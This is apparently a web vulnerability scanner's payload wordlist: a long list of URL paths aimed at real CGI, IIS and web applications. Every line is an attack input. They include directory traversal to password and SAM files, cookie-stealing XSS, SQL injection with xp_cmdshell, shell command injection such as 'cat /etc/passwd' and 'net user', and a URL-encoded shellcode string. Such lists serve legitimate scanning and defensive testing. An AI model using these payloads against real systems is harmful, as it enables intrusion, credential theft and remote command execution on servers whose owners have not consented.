/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png 
/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on 
/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
/path/auction.pl?searchstring=[XSS]&action=search&searchtype=keyword 
/webcgi/webbatch.exe?dumpinputdata 
/cgi-bin/mods/calendar/index.cgi?vsSD=[code]
/somedir/../cgi-bin/test.pl 
/cgi-bin/wiki.pl?<script>alert('XSSvulnerabilityexists')</script>
/cgi-bin/parse-file?TEMPLATE=<script>alert('Bahaa');</script>
/cgi-bin/parse-file?TEMPLATE=<script>alert
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd 
/profile.cgi?action=view&user=[XSS]
/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);</script> 
/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show+documents&_duration=[code]
/fom.cgi?file=[code]&showLastModified=show
/fom.cgi?_insert=answer&cmd=[code]&file=1 
/inbox/index.fts?folder=TEST&index=1 
/toc.pl?board=[XSS]&[member]=yes 
/atl.cgi?ct=&md=search&brf=&before=&sch_allsubct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/atl.cgi?ct=&md=search&brf=&before=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=view_downline&level=Direct&position=1[SQL]
/[path]/perldiver.pl?testhere<SCRIPT>alert(document.domain);</SCRIPT>
/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script> 
/scripts/sigmaweb.dll
/cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=<script>alert("foo")</script>&words=foo 
/malcode>
/com/cgi-bin/emsgb/easymsgb.pl?print=../../../../../../../../etc/passwd 
/cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&password=12345&msgid=0001&format=wav 
/cgi-bin/netclubs//vchat/scripts/imessage.cgi?toto=&to=&sentby=&fromuser=r0t&command=changefont&username=[XSS]
/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1
/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2
/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,
/cgi-bin/cookiemonster.cgi?'+document.cookie);
/cgi-bin/communimail/templates.cgi?saction=edit_form&form_id=[XSS]
/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course<input type="text" name="data__announcements___pk1_pk2__subject"value=?<script>alert(?worm activated!?)</script>? />
/hacked.js></script>
/deface.html";</script>
/addlink_lwp.cgi?url=[XSS]
/cgi-bin/netclubs//login.cgi?username=r0t&password=[XSS]
/<script>alert("Its not magic... its a sonic")</script>
/edittag/edittag.cgi?file=INJECT
/cgi-bin/lshop.cgi?action=showdetail&artnum=10[' UNION SELECT OR OTHER SQL]&wkid=2002g&ls=d&nocache=
/cgi-local/auktion/itemlist.pl?category=<script>alert("XSS")</script> 
/printcal.pl?year=[XSS-CODE]&month=11&type=4
/printcal.pl?year=&month=11&type=4[XSS-CODE]
/printcal.pl?type=4[XSS-CODE]
/compose.pl?id=cur/1117452847.H104572P10795.www.example.com%3A2%2C&folder=Sent&cache=&func=reply&type=reply[XSS-CODE]
/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]
/compose.pl?spellcheck=112253846919856.sc.new&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r
/compose.pl?func=new&To=lala@lala.es&Cc=&Bcc=[XSS-CODE]
/compose.pl?func=new&To=lala@lala.es&Cc=[XSS-CODE]&Bcc=
/compose.pl?func=new&To=lala@lala.es[XSS-CODE]&Cc=&Bcc=
/webadmin/filter.pl?func=viewmailrelay&Order=IPaddress[XSS-CODE]
/webadmin/filter.pl?func=filter&Header=blacklist_from&Type=1[XSS-CODE]&View=1
/webadmin/filter.pl?func=filter&Header=blacklist_from[XSS-CODE]&Type=1&View=1
/webadmin/filter.pl?func=filter&Header=whitelist_from&Type=0&Display=1&Sort=value[XSS-CODE]&Type=1&View=1 
/CGI-Bin/frame.html?Mehr=xxx
/CGI-Bin/frame.html?Mehr=xxx&SUPER=x 
/YaBB.pl?board=;action=modifycat;id=CATEGORYNAMEHERE;moda=Remove2</img>
/tornado/searcher.exe?v=root&p=<script>alert(/xss/)</script>
/path/login.pl?terminal=../css
/index.tpl?iid=[XSS]
/index.tpl?iid=l3a1b3&#9001;=[XSS]
/index.tpl?iid=l3a1b3&#9001;=1&iid2=[XSS]
/index.tpl?iid=l3a1b3&#9001;=1&iid2=3&r=[XSS]
/index.tpl?iid=l093a1b1&#9001;=1&iid2=[iid2]&r=[r]&cart=[XSS]
/index.tpl?iid=l093a1b1&#9001;=1&iid2=[iid2]&r=[r]&cart=11351542306899006&str=[XSS]
/index.tpl?a=search_adv&cart=11351544339319101&#9001;=1&iid=13&nf=[XSS]
/index.tpl?a=[XSS] 
/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho 
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 
\nquiz.pl <www.example.com> </path/> \"cmd\"\n";
/EDCstore.pl?user_action=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
//wwww.example.com
/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd
/scripts/mailpost.exe?*debug*=''&append=<script>alert('Can%20Cross%20Site%20Script')</script>
/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
/gi-bin/read.cgi?file=/home/config/users.cfg
/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf&section=PAGE2 
/axis-cgi/admin/restart.cgi
/cgi-bin/rxgoogle.cgi?query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
/scripts/mailpost.exe/..%255c..%255c..%255cwinnt/system.ini?*nosend*=&email=test@procheckup.com
/ppcal.cgi?action=shop&user=8001&start=21
/ppcal.cgi?action=shop&user=%22%3E%3Cscri
/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=[XSS]
/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=[XSS]
/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=[XSS]
/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=[XSS]
/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=[XSS]
/cgi-bin/netclubs//vchat/scripts/sendim.cgi?onuser=r0t&pass=&chatsys=netclubs&searchstring=netclubs&room=&username=&to=[XSS]
/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>
/script>
/script>
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/banners.cgi?aff=[XSS]
/banners.cgi?aff=&cat=[XSS]
/path.to/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('test!');a=[['
/cgi-bin/nbmember.cgi?cmd=test
/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword
/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60 
/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
/cgi-bin/smallmenu.pl?url=%3C/
/mm5/merchant.mvc&Screen=ACNT&Action=EMPW&Customer_Login="><script>document.write("\n<br><input%20type=text%20name=somenewfield%20value='Hello%20World'>")</script>
/dbabble?cmd="><evil_script> 
/mailman/admin/mailman/members?findmember=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%3E%3Cx%20y=%22 http
/mailman/listinfo/doesntexist%22
/pblsmb.cgi?cklv=0&listno=[XSS]
/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command| 
/cgi-bin/mojo/mojo.cgi?flavor=subscribe&email=%3Cscript%3Ealert%28%22XSS%20Vuln.%22%29%3C%2Fscript%3E&list=skazat_design_newsletter&submit=Submit 
/webglimpse.cgi?query=&ID=1[XSS] 
/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E
/WebAdmin/modalframe.wdm?file=http
/WebAdmin/useredit_account.wdm?user=otheruser@domain 
/admin.cgi?cmd=show&page=main.tpl&utoken=manager
/cp-app.cgi?usr=51H4515590&rnd=577308&rrc=N&affl=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/cgi-bin/calendar/Visitor.cgi?job=view_event&eventNo=0&sort_order=[XSS]
/cgi-bin/news/NsVisitor.cgi?job=view_article&articleNo=0&sort_order=[XSS]
/cgi-bin/search/search.cgi?q=[XSS]
/cgi-bin/classifieds/viewcat.cgi?cat_id=[XSS]
/index.cgi?page=../../../../../../../../etc/passwd%00 
/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Test');window.open+("http
/test.ks/raw_input
/test.ks/file?%22*10000000&mode=w
/test.ks/file?%22*2&mode=w 
/scripts/wgate/%22);alert('xss');alert(%22a/! 
/cart.cgi?action=link&product=%22%3E%3Cscri
/cart.cgi?action=search&category=%22%3E%3Cs
/cart.cgi?action=link&product=33&uid=%22%3E
/search.cgi?q=[XSS] 
/ldap/cgi-bin/ldacgi.exe?Action=<script>alert("foo")</script> 
/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<script>alert()</script>
/edittag/mkpw_mp.cgi?plain=XSS
/forum/support/dispatch.cgi/0;command 
/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue 
/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
/post.cgi?action=new&forum=[XSS] 
/awstats.pl?refererpagesfilter=[XSS]&refererpagesfilterex=&output=refererpages&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?refererpagesfilter=&refererpagesfilterex=[XSS]&output=refererpages&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?urlfilter=&urlfilterex=[XSS]&output=urlentry&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?urlfilter=[XSS]&urlfilterex=&output=urlentry&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?hostfilter=[XSS]&hostfilterex=&output=allhosts&config=unsecured-systems.com&year=2006&month=all
/awstats.pl?hostfilter=&hostfilterex=[XSS]&output=allhosts&config=unsecured-systems.com&year=2006&month=all
/index.pl?url=";><script>alert("You were hacked!")</script><br" 
/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test
/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns=
/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=.
/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.
/cgi-bin/w3-msql/<script>alert('xss')</script>
/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|
/explorer_wse/favorites.exe?Program=ws_irpt.exe&params=startDate=2011-10-29^endDate=2011-10-
/explorer_wse/favorites.exe?Program=ws_irpt.exe&params=startDate=2011-10-29^endDate=2011-10-
/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>alert(document.cookie)</script>&section=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>document.location=unescape("http
/server.np?base&site=XXXintra&catalog=catalog&template=../../../../../../../../../boot.ini 
/cgi-bin/cutecast/members/<username>.user 
/edittag/mkpw.cgi?plain=XSS
/webauthentication?GetPic?image=x%3Cimg%20src=%22A%22+onError=%22javascript
/edit.cgi?id=[XSS]
/edit.cgi?forgotid=[XSS]
/edit.cgi?forgotpass=[XSS]
//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
/edittag/edittag.pl?file=INJECT
/AUTH=[some_value]/user/list.tagz?Site=www.example.com&Mailbox=[html_code] 
/publique/cgi/cgilua.exe/sys/start.htm?sid=1 
/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notific
/members_only/index.cgi?id=[SQL]&username=r0t&seed=TfgNxKhyqEELQQQKizBWyVShdbOpfugMaQhpuGqI
/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=view_downline&level=[XSS]&position=10
/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=view_downline&level=Direct&position=1[XSS]
/members_only/index.cgi?id=[XSS]&username=r0t&seed=TfgNxKhyqEELQQQKizBWyVShdbOpfugMaQhpuGqI
/members_only/index.cgi?id=4&username=r0t&seed=rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=[XSS]&level=&position=10
/customer_area/index.cgi?id=1&username=r0t&seed=pWltDqcPcLuedZnXTwCNWldbpJmQANHFHfFvveFY&page=[XSS]
/pblscg.cgi?catsubno=[XSS]
/cgi-bin/e-cms/vis/vis.pl?s=001&p=../../../../etc/passwd%00
/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00 
/AUTH=[some_value]/user/viewmail.tagz?Site=www.example.com&Mailbox=3&MessageIndex=[html_code]>
/admin.pl?ad_name=%22%3E%3Ch1%3EXSS%20BUG%3C/h1%3E%3C!--
/cgi-bin/dnewsweb.exe?cmd=PATH&group=XSS 
/cgi-bin/dnewsweb.exe?utag=XSS 
/webx?@[code] 
/cgi-bin/index.pl?section_name=whatever&section=ioffice&parametre=|id| 
/malcode>
/links.asp?keywords=[XSS]
/edittag/edittag_mp.pl?file=INJECT
/cgi-bin/bizmail/bizmail.cgi"
/bol.cgi?file=[XSS]
/bol.cgi?function=[XSS]
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/aaa[471]aaa 
//ieframe.dll/acr_error.htm#<h1>foo</h1>,<h1>foo</h1> res
/%-$%/'%/,%/)%//%0%%0!%/#%./%/!%20%,(%/#%/#%0!%/!%0&%//% 20%/*%/%%/)%/,%.-%/-%//%0%.txt
/AAA...[x3000]...AAA
/AAA...[x5000]...AAA
/* 
/%
/%A 
/user
/cgi-bin/math_sum.mscgi?a=
/cgi-bin/math_sum.mscgi??=
/cgi-bin/post.mscgi???
/AAA...(approx. Ax994)...AAA 
/Exchange/victim_id" method="post" target="_self">
/?%25n
///c
/%x 
//example.com@www.example.com/foo/#{")
/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html> 
/MediaServerListing.exe?[long_string] 
/cgi-bin/hpnst.exe?c=p+i=hpnst.exe 
//example.com@www.example.com/foo/#{")
/search?hl=en&ie=UTF-8&oe=UTF-8&q=^S^R^S 
/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.
/scripts/cgiip.exe/WService=wsbroker1/dict.r
/scripts/cgiip.exe/WService=wsbroker1/_help.r
/scripts/cgiip.exe/WService=wsbroker1/_dict.r
/scripts/cgiip.exe/WService=wsbroker1/_comp.r
/scripts/cgiip.exe/WService=wsbroker1/_admin.r 
/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=<script>alert("XSS");</script>&QtnType=9
/dynamic.yaws%00 
/%70rotected/secret.html
/protected%2fsecret.html 
/mail/m602cl3w.exe?A=GetFile&USER=7921604D7A587937986E24242C0588&DL=0&FN=../../../boot.ini
/[path]/somescript.asp%00 
/.../.../ 
/citrix/metaframexp/default/login.asp?NFuse_LogoutId=On&NFuse_
/cgi-bin/ask.cgi">
/cgi-bin/ask2.cgi">
/cgi-bin/ask2.cgi">
/../[code] 
/../user.ini 
/%5c../test.ini
/c
/../windows/system.ini 
/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21-- 
/">
/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0=add&a1=root&a2=%5C
/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript
/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript
/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript
/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript
/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript
/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript
/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
/script.php?param=javascript
/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script> 
/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini
/hello.exe" frameborder="0" width="0" height="0">');
/../../../autoexec.bat 
/.../.../.../.../.../windows/
/.../.../.../.../.../.../windows/explorer.exe
/.../.../.../.../.../.../.../.../windows/system32/cmd.exe?/c+dir
/cgi-bin/upload.exe?/some_random_directory
/cgi-bin/upload.exe?/.../.../.../.../.../.../windows/
/index.html.
/test.py.
/test.php. 
/.../.../test.txt
/../../../../autoexec.bat
/../../../autoexec.bat
/../../boot.ini
/../../boot.ini
/../../../boot.ini
/../../../boot.ini
/..\..\..\file.ext
/../../../file.ext
/%2E%2E%5C%2E%2E%5C%2E%2E%5Cfile.ext
/%2E%2E%2F%2E%2E%2F%2E%2E%2Ffile.ext 
//example.com@www.example.com/foo/#{");
/docs/NED?action=retrieve&location=http
/activescan/activescan/ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20Vulnerability%27%29%3C/script%3E%26&pais=62&provincia=9&tipousuario=0&enviar=1&ode=0#
/xampp/phonebook.php?action=del&id=1 or 1 
/A>
/.\.\.\.\/windows/system.ini
/.\.\.\.\.\.\.\.\.\.\/windows/system.ini 
/ldap/cgi-bin/ldacgi.exe?Action=Substitute&Template=../../../../../boot.ini&Sub=LocalePath&LocalePath=enus1252
/Scripts/cruise/cws.exe?doc=../data/system.wdb
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini 
/%1b%5d%32%3b%6f%77%6e%65%64%07%0a 
/psynch/nph-psa.exe?lang=
/psynch/nph-psf.exe?lang= 
/A>
/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
/swfs/index.swf','new')
/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E 
/../../winnt/win.ini%00examples/jsp/hello.jsp
/%2e%2e/%2e%2e/%00.jsp
/%2e%2e/%2e%2e%5cfilename%00.jsp
/session/logout?RCredirect=>'><script>alert('XSS')</script>
/session/logout?RCredirect=>"><script>alert("XSS")</script>
/session/logout?RCredirect=>%22%27><img%20src
/Test.pl. ( '.' )
/Test.php%2e ( '%2e' )
/xampp/cds.php?action=del&id=1 or 1 
/
/fake_path/fake_filename.html
/admin/logs/HCDiskQuotaService.csv 
/"><table><tr><td><a
/">Click here</td></tr></table></a>
/project_name/en/frameset-7.html#http
/Scripts/cruise/cws.exe?doc=%90%EB%5E%60%8B%5C%24%28%8B%73%3C%8B%74%33%78%03%F3%8B%7E
/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida
/windows/repair/sam 
/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1
/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
/admin.html 
/
/lpext.dll?f=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/a%20HTTP/1.0"%20200%202048%0d%0a255.255.255.255%20-%20-%20[06/Mar/2005%3a22%3a31%3a11%20+0800]%20"GET%20/hack
/%0d%0atype%20cgi-bin%5Ctest.bat
/scripts/cmdIS.dll/httpd.log 
/images/jss.jpg" <script>alert(.blah.);</script> ></img>
/ext.dll?mfcisapicommand=PassThru&url=[Any IP
/"/><script>alert(document.getElementsByTagName("PRE")[0].firstChild.data)</script> 
/ishttpd/localweb/filename
/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
/ishttpd/localweb/java/?/../../../ishttpd.exe
/iframe>
/%3Cscript%3Ealert('CSS_Vulnerable')%3C/script%3E
/%80../%80../%80../%80../%80../%80../%80../%80../ 
/../../boot.ini
/../../../boot.ini
/../../../../boot.ini
/../../../../../boot.ini
/../../../../../../boot.ini
/program files/pablo's ftp service/users.dat 
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/winshare/info.php\ 
/cam1.jpg
/cam2.jpg
/cam[1-16].jpg 
/?%25n
/../../../../boot.ini%00.html
/./../mpweb.ini
/./.././.././../winnt/repair/sam 
/docs/NED?action=retrieve&location=. 
/sharepoint/default.aspx/%22);}if(true){alert(%22qwertytis
/%5c..%5c..%5c..%5cwindows%5cwin.ini
/%5c..%5c..%5c..%5cwindows%5cwin%2eini
/\..\..\..\windows\win.ini
/WebID/IISWebAgentIF.dll?Redirect?url=ftp
/log/
/option.ini 
/../../../../../WINNT/repair/sam 
/\cgi-bin/[file]
/\\\cgi-bin/[file]
/%5ccgi-bin/[file]
/"><input type="image" src="http
/%00/<script>alert('X.S.S')</script> 
/%2e%2e/%2e%2e/%2e%2e
/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._
/%2e%2e/logs
/%2e%2e/system 
/crystalreportviewers/crystalimagehandler.aspx?dynamicimage=..\..\..\..\..\mydocuments\private\passwords.txt
//user
//jelmer@www.example.com
/index.html/<script>alert('XSS')</script>
/scripts%c0%afcmd.exe
/scripts%e0%80%afcmd.exe
/scripts%c1%9ccmd.exe 
/webadmin.nsf
/%00/
//ieframe.dll/navcancl.htm#http
/.../.../.../.../.../.../windows/system.ini
/..\..\..\..\..\..\..\..\windows/system.ini 
//example.com@www.example.com/foo/#{")
/<long_buffer><script_to_execute>.idc 
/docs/<script>alert('@stake');</script> 
/../../windows/system.ini
/internal.sws?../../windows/system.ini 
/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9 idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss') +ADw-/script+AD4---//-- 
/disk_c/Documents%20and%20Settings/All%20Users/Start%20Menu/Programs/Startup
/protected_FAT32_dir.
/protected_FAT32_dir./
/protected_FAT32_dir%2e 
/duh.txt#malware"></v
/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../ 
/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini
/%20 
/form></a>
/?maliciousContents"></a></p>
/?trustedSite">
/?trustedSite ">
/?trustedSite
/../../../windows/repair/sam 
/../../../windows/system.ini
/..\..\..\windows/system.ini 
/ 
/cgitest.html?<script>wi ndow.location="/cgi-bin/cgitest.exe?|<blahblah>%00";</script>
/cgitest.html?<script>(document.cookie)</script>
/mail?A=/../../../../../../../[file] 
/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical
/1.1
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c
/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd 
/.Templates/Commands/Upload.shtml?TargetName=<script>alert('XSS')</script>
/scripts/cgiip.exe/WService=wsbroker1/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fil
/../test/test.txt 
/webadmin.nsf
/\../\../\../WINDOWS\SYSTEM32\calc.exe
/\../\../\../WINDOWS\SYSTEM32\config\sam
/\../\../\../WINDOWS\SYSTEM32
/\../\../\../boot.ini
/antville/project/<script>alert('XSS');</script> 
/../../existing_file
/../../ [show the files and the folders in C drive - if the 'Show Directory list when homepage does not exist' option is active.] 
/somefile.exe','c
/sysadmin/system/show.asp?show=<script>alert("oops")</script>
/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8%dc%ff%ff%ffreboot
/browse then insert an username longer than 100 chars
/dl?file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/browse?path=%2f..%2f..%2f
/dl?file=\file.txt.
2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http
